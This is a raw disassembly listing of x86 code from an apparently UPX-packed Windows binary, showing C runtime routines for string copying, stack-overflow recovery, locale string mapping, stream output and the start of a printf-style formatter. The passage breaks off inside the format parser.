loc_41C049: ; CODE XREF: sub_41BFC0+A6�j
; sub_41BFC0+C0�j
mov [edi], edx
add edi, 4
loc_41C04E: ; CODE XREF: sub_41BFC0+6F�j
; sub_41BFC0+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41C049
test dl, dl
jz short loc_41C0A0
test dh, dh
jz short loc_41C097
test edx, 0FF0000h
jz short loc_41C08A
test edx, 0FF000000h
jz short loc_41C082
jmp short loc_41C049
; ---------------------------------------------------------------------------
loc_41C082: ; CODE XREF: sub_41BFC0+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C08A: ; CODE XREF: sub_41BFC0+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C097: ; CODE XREF: sub_41BFC0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C0A0: ; CODE XREF: sub_41BFC0+78�j
; sub_41BFC0+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41BFC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0A8 proc near ; CODE XREF: sub_419A76+A5�p
; sub_41A0AD+A5�p ...
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 4
pop eax
call sub_4192D0
mov esi, esp
push 1Ch
lea eax, [ebp+var_28]
push eax
push esi
call dword_424188 ; VirtualQuery
test eax, eax
jz short loc_41C143
mov ebx, [ebp+var_24]
lea eax, [ebp+var_4C]
push eax
call dword_4241D4 ; GetSystemInfo
mov ecx, [ebp+var_48]
mov eax, dword_44C048
lea edi, [ecx-1]
not edi
and edi, esi
sub edi, ecx
mov esi, eax
dec esi
neg esi
sbb esi, esi
and esi, 0FFFFFFF1h
add esi, 11h
imul esi, ecx
add esi, ebx
cmp edi, esi
mov [ebp+var_8], ecx
jb short loc_41C143
cmp eax, 1
jz short loc_41C164
mov [ebp+var_4], ebx
mov ebx, 1000h
loc_41C110: ; CODE XREF: sub_41C0A8+84�j
push 1Ch
lea eax, [ebp+var_28]
push eax
push [ebp+var_4]
call dword_424188 ; VirtualQuery
test eax, eax
jz short loc_41C143
mov eax, [ebp+var_1C]
add [ebp+var_4], eax
test [ebp+var_18], ebx
jz short loc_41C110
test [ebp+var_13], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jz short loc_41C13F
xor eax, eax
inc eax
jmp short loc_41C183
; ---------------------------------------------------------------------------
loc_41C13F: ; CODE XREF: sub_41C0A8+90�j
cmp edi, eax
jnb short loc_41C147
loc_41C143: ; CODE XREF: sub_41C0A8+22�j
; sub_41C0A8+59�j ...
xor eax, eax
jmp short loc_41C183
; ---------------------------------------------------------------------------
loc_41C147: ; CODE XREF: sub_41C0A8+99�j
cmp eax, esi
jnb short loc_41C14E
mov [ebp+var_4], esi
loc_41C14E: ; CODE XREF: sub_41C0A8+A1�j
push 4
push ebx
push [ebp+var_8]
push [ebp+var_4]
call dword_4240F4 ; VirtualAlloc
mov eax, dword_44C048
jmp short loc_41C167
; ---------------------------------------------------------------------------
loc_41C164: ; CODE XREF: sub_41C0A8+5E�j
mov [ebp+var_4], edi
loc_41C167: ; CODE XREF: sub_41C0A8+BA�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_C]
push ecx
inc eax
push eax
push [ebp+var_8]
push [ebp+var_4]
call dword_4241D0 ; VirtualProtect
loc_41C183: ; CODE XREF: sub_41C0A8+95�j
; sub_41C0A8+9D�j
lea esp, [ebp-58h]
pop edi
pop esi
pop ebx
leave
retn
sub_41C0A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C18B proc near ; CODE XREF: sub_419A76+6F�p
; sub_419A76+E5�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_425470
call __SEH_prolog
xor ebx, ebx
cmp dword_44BEE8, ebx
jnz short loc_41C1D9
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_42546C
push 100h
push ebx
call dword_424180 ; LCMapStringW
test eax, eax
jz short loc_41C1C4
mov dword_44BEE8, esi
jmp short loc_41C1D9
; ---------------------------------------------------------------------------
loc_41C1C4: ; CODE XREF: sub_41C18B+2F�j
call dword_42412C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41C1D9
mov dword_44BEE8, 2
loc_41C1D9: ; CODE XREF: sub_41C18B+14�j
; sub_41C18B+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_41C1F9
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_41C1E4: ; CODE XREF: sub_41C18B+61�j
dec ecx
cmp [eax], bl
jz short loc_41C1F1
inc eax
cmp ecx, ebx
jnz short loc_41C1E4
or ecx, 0FFFFFFFFh
loc_41C1F1: ; CODE XREF: sub_41C18B+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_41C1F9: ; CODE XREF: sub_41C18B+51�j
mov eax, dword_44BEE8
cmp eax, 2
jz loc_41C3E3
cmp eax, ebx
jz loc_41C3E3
cmp eax, 1
jnz loc_41C416
xor edi, edi
mov [ebp+var_2C], edi
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
cmp [ebp+arg_18], ebx
jnz short loc_41C230
mov eax, dword_44C1C4
mov [ebp+arg_18], eax
loc_41C230: ; CODE XREF: sub_41C18B+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call dword_4240FC ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz loc_41C416
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C29C
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
xor ebx, ebx
mov [ebp+var_1C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_2C]
mov esi, [ebp+var_30]
loc_41C29C: ; CODE XREF: sub_41C18B+F4�j
cmp [ebp+var_1C], ebx
jnz short loc_41C2BD
lea eax, [esi+esi]
push eax
call sub_419DCB
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_41C416
mov [ebp+var_38], 1
loc_41C2BD: ; CODE XREF: sub_41C18B+114�j
push esi
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_4240FC ; MultiByteToWideChar
test eax, eax
jz loc_41C3C0
push ebx
push ebx
push esi
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_424180 ; LCMapStringW
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, ebx
jz loc_41C3C0
test byte ptr [ebp+arg_4+1], 4
jz short loc_41C32C
cmp [ebp+arg_14], ebx
jz loc_41C3C0
cmp edi, [ebp+arg_14]
jg loc_41C3C0
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_424180 ; LCMapStringW
jmp loc_41C3C0
; ---------------------------------------------------------------------------
loc_41C32C: ; CODE XREF: sub_41C18B+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C36A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
xor ebx, ebx
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_2C]
mov esi, [ebp+var_30]
loc_41C36A: ; CODE XREF: sub_41C18B+1C2�j
cmp [ebp+var_20], ebx
jnz short loc_41C387
lea eax, [edi+edi]
push eax
call sub_419DCB
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_41C3C0
mov [ebp+var_34], 1
loc_41C387: ; CODE XREF: sub_41C18B+1E2�j
push edi
push [ebp+var_20]
push esi
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_424180 ; LCMapStringW
test eax, eax
jz short loc_41C3C0
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_41C3AA
push ebx
push ebx
jmp short loc_41C3B0
; ---------------------------------------------------------------------------
loc_41C3AA: ; CODE XREF: sub_41C18B+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41C3B0: ; CODE XREF: sub_41C18B+21D�j
push edi
push [ebp+var_20]
push ebx
push [ebp+arg_18]
call dword_42410C ; WideCharToMultiByte
mov edi, eax
loc_41C3C0: ; CODE XREF: sub_41C18B+149�j
; sub_41C18B+168�j ...
cmp [ebp+var_34], ebx
jz short loc_41C3CE
push [ebp+var_20]
call sub_419DDD
pop ecx
loc_41C3CE: ; CODE XREF: sub_41C18B+238�j
cmp [ebp+var_38], ebx
jz short loc_41C3DC
push [ebp+var_1C]
call sub_419DDD
pop ecx
loc_41C3DC: ; CODE XREF: sub_41C18B+246�j
mov eax, edi
jmp loc_41C53E
; ---------------------------------------------------------------------------
loc_41C3E3: ; CODE XREF: sub_41C18B+76�j
; sub_41C18B+7E�j
mov [ebp+var_28], ebx
xor edi, edi
mov [ebp+var_3C], ebx
cmp [ebp+arg_0], ebx
jnz short loc_41C3F8
mov eax, dword_44C1B4
mov [ebp+arg_0], eax
loc_41C3F8: ; CODE XREF: sub_41C18B+263�j
cmp [ebp+arg_18], ebx
jnz short loc_41C405
mov eax, dword_44C1C4
mov [ebp+arg_18], eax
loc_41C405: ; CODE XREF: sub_41C18B+270�j
push [ebp+arg_0]
call sub_4218B5
pop ecx
mov [ebp+var_40], eax
cmp eax, 0FFFFFFFFh
jnz short loc_41C41D
loc_41C416: ; CODE XREF: sub_41C18B+87�j
; sub_41C18B+CD�j ...
xor eax, eax
jmp loc_41C53E
; ---------------------------------------------------------------------------
loc_41C41D: ; CODE XREF: sub_41C18B+289�j
cmp eax, [ebp+arg_18]
jz loc_41C514
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_4218F8
add esp, 18h
mov [ebp+var_28], eax
cmp eax, ebx
jz short loc_41C416
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_424184 ; LCMapStringA
mov esi, eax
mov [ebp+var_24], esi
cmp esi, ebx
jz loc_41C503
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_420CC0
add esp, 0Ch
jmp short loc_41C494
; ---------------------------------------------------------------------------
loc_41C484: ; DATA XREF: UPX0:stru_425470�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41C488: ; DATA XREF: UPX0:stru_425470�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0A8
xor ebx, ebx
xor edi, edi
loc_41C494: ; CODE XREF: sub_41C18B+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41C4BF
push [ebp+var_24]
call sub_419DCB
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_41C4DC
push [ebp+var_24]
push ebx
push edi
call sub_420CC0
add esp, 0Ch
mov [ebp+var_3C], 1
loc_41C4BF: ; CODE XREF: sub_41C18B+30F�j
push [ebp+var_24]
push edi
push [ebp+arg_C]
push [ebp+var_28]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_424184 ; LCMapStringA
mov [ebp+var_24], eax
cmp eax, ebx
jnz short loc_41C4E0
loc_41C4DC: ; CODE XREF: sub_41C18B+31E�j
xor esi, esi
jmp short loc_41C506
; ---------------------------------------------------------------------------
loc_41C4E0: ; CODE XREF: sub_41C18B+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_24]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_40]
call sub_4218F8
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_41C506
; ---------------------------------------------------------------------------
loc_41C503: ; CODE XREF: sub_41C18B+2D0�j
mov esi, [ebp+var_48]
loc_41C506: ; CODE XREF: sub_41C18B+353�j
; sub_41C18B+376�j
cmp [ebp+var_3C], ebx
jz short loc_41C52E
push edi
call sub_419DDD
pop ecx
jmp short loc_41C52E
; ---------------------------------------------------------------------------
loc_41C514: ; CODE XREF: sub_41C18B+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_424184 ; LCMapStringA
mov esi, eax
loc_41C52E: ; CODE XREF: sub_41C18B+37E�j
; sub_41C18B+387�j
cmp [ebp+var_28], ebx
jz short loc_41C53C
push [ebp+var_28]
call sub_419DDD
pop ecx
loc_41C53C: ; CODE XREF: sub_41C18B+3A6�j
mov eax, esi
loc_41C53E: ; CODE XREF: sub_41C18B+253�j
; sub_41C18B+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_41C18B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C547 proc near ; CODE XREF: sub_419B8A+4B�p
; sub_419EEB+C2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_41C653
test al, 40h
jnz loc_41C653
test al, 1
jz short loc_41C580
and dword ptr [esi+4], 0
test al, 10h
jz loc_41C653
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_41C580: ; CODE XREF: sub_41C547+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41C5BC
cmp esi, offset dword_42A300
jz short loc_41C5AA
cmp esi, offset dword_42A320
jnz short loc_41C5B5
loc_41C5AA: ; CODE XREF: sub_41C547+59�j
push ebx
call sub_421C24
test eax, eax
pop ecx
jnz short loc_41C5BC
loc_41C5B5: ; CODE XREF: sub_41C547+61�j
push esi
call sub_421BE0
pop ecx
loc_41C5BC: ; CODE XREF: sub_41C547+51�j
; sub_41C547+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_41C629
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_41C5E9
push edi
push eax
push ebx
call sub_41E126
mov [ebp+arg_4], eax
jmp short loc_41C61C
; ---------------------------------------------------------------------------
loc_41C5E9: ; CODE XREF: sub_41C547+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_41C607
mov ecx, ebx
sar ecx, 5
mov ecx, ds:dword_47C640[ecx*4]
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_41C60C
; ---------------------------------------------------------------------------
loc_41C607: ; CODE XREF: sub_41C547+A5�j
mov eax, offset dword_42AAE0
loc_41C60C: ; CODE XREF: sub_41C547+BE�j
test byte ptr [eax+4], 20h
jz short loc_41C61F
push 2
push 0
push ebx
call sub_421B35
loc_41C61C: ; CODE XREF: sub_41C547+A0�j
add esp, 0Ch
loc_41C61F: ; CODE XREF: sub_41C547+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_41C63D
; ---------------------------------------------------------------------------
loc_41C629: ; CODE XREF: sub_41C547+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41E126
add esp, 0Ch
mov [ebp+arg_4], eax
loc_41C63D: ; CODE XREF: sub_41C547+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_41C649
or dword ptr [esi+0Ch], 20h
jmp short loc_41C659
; ---------------------------------------------------------------------------
loc_41C649: ; CODE XREF: sub_41C547+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_41C65C
; ---------------------------------------------------------------------------
loc_41C653: ; CODE XREF: sub_41C547+10�j
; sub_41C547+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_41C659: ; CODE XREF: sub_41C547+100�j
or eax, 0FFFFFFFFh
loc_41C65C: ; CODE XREF: sub_41C547+10A�j
pop esi
pop ebx
pop ebp
retn
sub_41C547 endp
; =============== S U B R O U T I N E =======================================
sub_41C660 proc near ; CODE XREF: sub_41C693+11�p
; sub_41C6B7+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_41C66C
cmp dword ptr [ecx+8], 0
jz short loc_41C690
loc_41C66C: ; CODE XREF: sub_41C660+4�j
dec dword ptr [ecx+4]
js short loc_41C67C
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_41C688
; ---------------------------------------------------------------------------
loc_41C67C: ; CODE XREF: sub_41C660+F�j
movsx eax, al
push ecx
push eax
call sub_41C547
pop ecx
pop ecx
loc_41C688: ; CODE XREF: sub_41C660+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_41C690
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_41C690: ; CODE XREF: sub_41C660+A�j
; sub_41C660+2B�j
inc dword ptr [esi]
retn
sub_41C660 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C693 proc near ; CODE XREF: sub_41C6EE+6EF�p
; sub_41C6EE+71D�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_41C6AE
; ---------------------------------------------------------------------------
loc_41C69B: ; CODE XREF: sub_41C693+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_41C660
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41C6B4
loc_41C6AE: ; CODE XREF: sub_41C693+6�j
cmp [ebp+arg_4], 0
jg short loc_41C69B
loc_41C6B4: ; CODE XREF: sub_41C693+19�j
pop esi
pop ebp
retn
sub_41C693 endp
; =============== S U B R O U T I N E =======================================
sub_41C6B7 proc near ; CODE XREF: sub_41C6EE+706�p
; sub_41C6EE+767�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_41C6E4
cmp dword ptr [edi+8], 0
jnz short loc_41C6E4
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_41C6EB
; ---------------------------------------------------------------------------
loc_41C6D1: ; CODE XREF: sub_41C6B7+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_41C660
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41C6EB
loc_41C6E4: ; CODE XREF: sub_41C6B7+A�j
; sub_41C6B7+10�j
cmp [esp+8+arg_0], 0
jg short loc_41C6D1
loc_41C6EB: ; CODE XREF: sub_41C6B7+18�j
; sub_41C6B7+2B�j
pop esi
pop ebx
retn
sub_41C6B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1D4h
sub_41C6EE proc near ; CODE XREF: sub_419B8A+2A�p
; sub_41A2ED+28�p
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_223 = byte ptr -223h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-1D4h]
sub esp, 254h
mov eax, dword_42A290
mov [ebp+1D4h+var_4], eax
xor eax, eax
mov [ebp+1D4h+var_21C], eax
mov [ebp+1D4h+var_220], eax
mov [ebp+1D4h+var_234], eax
mov eax, [ebp+1D4h+arg_4]
push ebx
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_41CEB1
push esi
push edi
mov edi, eax
jmp short loc_41C72E
; ---------------------------------------------------------------------------
loc_41C72B: ; CODE XREF: sub_41C6EE+7BB�j
mov ecx, [ebp+1D4h+var_244]
loc_41C72E: ; CODE XREF: sub_41C6EE+3B�j
inc edi
cmp [ebp+1D4h+var_220], 0
mov [ebp+1D4h+arg_4], edi
jl loc_41CEAF
cmp bl, 20h
jl short loc_41C758
cmp bl, 78h
jg short loc_41C758
movsx eax, bl
movsx eax, byte ptr stru_425470.ExitProc[eax]
and eax, 0Fh
jmp short loc_41C75A
; ---------------------------------------------------------------------------
loc_41C758: ; CODE XREF: sub_41C6EE+54�j
; sub_41C6EE+59�j
xor eax, eax
loc_41C75A: ; CODE XREF: sub_41C6EE+68�j
movsx eax, byte_425498[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1D4h+var_244], eax
ja loc_41CE9F ; default
jmp off_41CEC8[eax*4] ; switch jump
loc_41C77A: ; DATA XREF: UPX0:off_41CEC8�o
xor eax, eax ; jumptable 0041C773 case 1
or [ebp+1D4h+var_214], 0FFFFFFFFh
mov [ebp+1D4h+var_240], eax
mov [ebp+1D4h+var_238], eax
mov [ebp+1D4h+var_22C], eax
mov [ebp+1D4h+var_228], eax
mov [ebp+1D4h+var_210], eax
mov [ebp+1D4h+var_230], eax
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C797: ; CODE XREF: sub_41C6EE+85�j
; DATA XREF: UPX0:off_41CEC8�o
movsx eax, bl ; jumptable 0041C773 case 2
sub eax, 20h
jz short loc_41C7DA
sub eax, 3
jz short loc_41C7D1
sub eax, 8
jz short loc_41C7C8
dec eax
dec eax
jz short loc_41C7BF
sub eax, 3
jnz loc_41CE9F ; default
or [ebp+1D4h+var_210], 8
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C7BF: ; CODE XREF: sub_41C6EE+BD�j
or [ebp+1D4h+var_210], 4
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C7C8: ; CODE XREF: sub_41C6EE+B9�j
or [ebp+1D4h+var_210], 1
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C7D1: ; CODE XREF: sub_41C6EE+B4�j
or byte ptr [ebp+1D4h+var_210], 80h
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C7DA: ; CODE XREF: sub_41C6EE+AF�j
or [ebp+1D4h+var_210], 2
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C7E3: ; CODE XREF: sub_41C6EE+85�j
; DATA XREF: UPX0:off_41CEC8�o
cmp bl, 2Ah ; jumptable 0041C773 case 3
jnz short loc_41C80F
add [ebp+1D4h+arg_8], 4
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+1D4h+var_22C], eax
jge loc_41CE9F ; default
or [ebp+1D4h+var_210], 4
neg [ebp+1D4h+var_22C]
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C80F: ; CODE XREF: sub_41C6EE+F8�j
mov eax, [ebp+1D4h+var_22C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+1D4h+var_22C], eax
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C824: ; CODE XREF: sub_41C6EE+85�j
; DATA XREF: UPX0:off_41CEC8�o
and [ebp+1D4h+var_214], 0 ; jumptable 0041C773 case 4
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C82D: ; CODE XREF: sub_41C6EE+85�j
; DATA XREF: UPX0:off_41CEC8�o
cmp bl, 2Ah ; jumptable 0041C773 case 5
jnz short loc_41C856
add [ebp+1D4h+arg_8], 4
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+1D4h+var_214], eax
jge loc_41CE9F ; default
or [ebp+1D4h+var_214], 0FFFFFFFFh
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C856: ; CODE XREF: sub_41C6EE+142�j
mov eax, [ebp+1D4h+var_214]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+1D4h+var_214], eax
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C86B: ; CODE XREF: sub_41C6EE+85�j
; DATA XREF: UPX0:off_41CEC8�o
cmp bl, 49h ; jumptable 0041C773 case 6
jz short loc_41C89E
cmp bl, 68h
jz short loc_41C895
cmp bl, 6Ch
jz short loc_41C88C
cmp bl, 77h
jnz loc_41CE9F ; default
or byte ptr [ebp+1D4h+var_210+1], 8
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C88C: ; CODE XREF: sub_41C6EE+18A�j
or [ebp+1D4h+var_210], 10h
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C895: ; CODE XREF: sub_41C6EE+185�j
or [ebp+1D4h+var_210], 20h
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C89E: ; CODE XREF: sub_41C6EE+180�j
mov al, [edi]
cmp al, 36h
jnz short loc_41C8BB
cmp byte ptr [edi+1], 34h
jnz short loc_41C8BB
inc edi
inc edi
or byte ptr [ebp+1D4h+var_210+1], 80h
mov [ebp+1D4h+arg_4], edi
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C8BB: ; CODE XREF: sub_41C6EE+1B4�j
; sub_41C6EE+1BA�j
cmp al, 33h
jnz short loc_41C8D6
cmp byte ptr [edi+1], 32h
jnz short loc_41C8D6
inc edi
inc edi
and byte ptr [ebp+1D4h+var_210+1], 7Fh
mov [ebp+1D4h+arg_4], edi
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C8D6: ; CODE XREF: sub_41C6EE+1CF�j
; sub_41C6EE+1D5�j
cmp al, 64h
jz loc_41CE9F ; default
cmp al, 69h
jz loc_41CE9F ; default
cmp al, 6Fh
jz loc_41CE9F ; default
cmp al, 75h
jz loc_41CE9F ; default
cmp al, 78h
jz loc_41CE9F ; default
cmp al, 58h
jz loc_41CE9F ; default
and [ebp+1D4h+var_244], 0
loc_41C90A: ; CODE XREF: sub_41C6EE+85�j
; DATA XREF: UPX0:off_41CEC8�o
mov ecx, off_42AB04 ; jumptable 0041C773 case 0
and [ebp+1D4h+var_230], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41C937
mov ecx, [ebp+1D4h+arg_0]
lea esi, [ebp+1D4h+var_220]
mov al, bl
call sub_41C660
mov bl, [edi]
inc edi
mov [ebp+1D4h+arg_4], edi
loc_41C937: ; CODE XREF: sub_41C6EE+22E�j
mov ecx, [ebp+1D4h+arg_0]
lea esi, [ebp+1D4h+var_220]
mov al, bl
call sub_41C660
jmp loc_41CE9F ; default
; ---------------------------------------------------------------------------
loc_41C94C: ; CODE XREF: sub_41C6EE+85�j
; DATA XREF: UPX0:off_41CEC8�o
movsx eax, bl ; jumptable 0041C773 case 7
cmp eax, 67h
jg loc_41CBB0
cmp eax, 65h
jge loc_41C9E7
cmp eax, 58h
jg loc_41CA48
jz loc_41CC31
sub eax, 43h
jz loc_41CA07
dec eax
dec eax
jz short loc_41C9DD
dec eax
dec eax
jz short loc_41C9DD
sub eax, 0Ch
jnz loc_41CD8B
test word ptr [ebp+1D4h+var_210], 830h
jnz short loc_41C996
or byte ptr [ebp+1D4h+var_210+1], 8
